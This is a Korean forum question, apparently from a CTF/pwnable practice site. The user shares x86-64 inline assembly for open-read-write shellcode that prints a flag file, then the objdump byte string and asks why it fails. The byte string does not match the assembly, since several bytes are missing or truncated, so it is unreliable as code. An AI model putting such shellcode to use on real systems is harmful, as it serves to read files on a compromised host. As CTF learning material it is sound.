완료됨
풀이의 코드와 다른점이 사실상 없는데 왜 안되는건가요?
pwntool의 기능이 아닌 직접 코드를 짜서 할려고 하는데 안되네요
__asm__(
".global run_sh\n"
"run_sh:\n"
"mov rax, 0x676E6F6F6F6F6F6F\n"
"push rax \n"
"mov rax, 0x6C5F73695F656D61\n"
"push rax \n"
"mov rax, 0x6E5F67616C662F63\n"
"push rax \n"
"mov rax, 0x697361625F6C6C65\n"
"push rax \n"
"mov rax, 0x68732F656D6F682F \n"
"push rax \n"
"mov rdi, rsp\n"
"xor rsi, rsi\n"
"xor rdx, rdx\n"
"mov rax, 2\n"
"syscall\n"
"mov rdi, rax\n"
"mov rsi, rsp\n"
"sub rsi, 0x30\n"
"mov rdx, 0x30\n"
"mov rax, 0x0\n"
"syscall\n"
"mov rdi, 1\n"
"mov rax, 0x1\n"
"syscall\n"
);
void run_sh();
int main() { run_sh(); }
어셈블리 코드는 다음과 같습니다.
쉘코드는 objdump로 구해서
\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\xc7\xc0\x02\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\x48\xc7\xc2\x30\x00\x00\x48\xc7\xc0\x00\x00\x00\x0f\x05\x48\xc7\xc7\x01\x00\x00\x48\xc7\xc0\x01\x00\x00\x0f\x05
이렇게 나왔고요
#pwnable
